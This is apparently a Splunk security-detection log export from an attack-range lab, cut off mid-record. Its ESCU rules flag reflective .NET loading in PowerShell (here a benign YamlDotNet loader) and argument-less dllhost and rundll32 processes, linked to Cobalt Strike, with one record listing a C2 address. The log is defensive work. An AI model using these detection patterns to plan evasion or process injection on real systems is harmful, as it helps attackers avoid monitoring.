analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T15:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T15:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664816133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T15:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T15:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664809200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664809200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6164", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664809200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664809200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17800", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664809200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664809200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4588", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="20780", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x512c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - DLLHost with no Command Line Arguments with Network - Rule", C2="10.0.1.14", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_image\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", dest="exchange01.attackrange.local", dest_port="53", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="1392", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="The process dllhost.exe was spawned by $parent_image$ without any command-line arguments on exchange01.attackrange.local by $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="dllhost.exe", threat_object_type="process" 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="92", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="5932", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="5584", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="4468", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="2528", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": 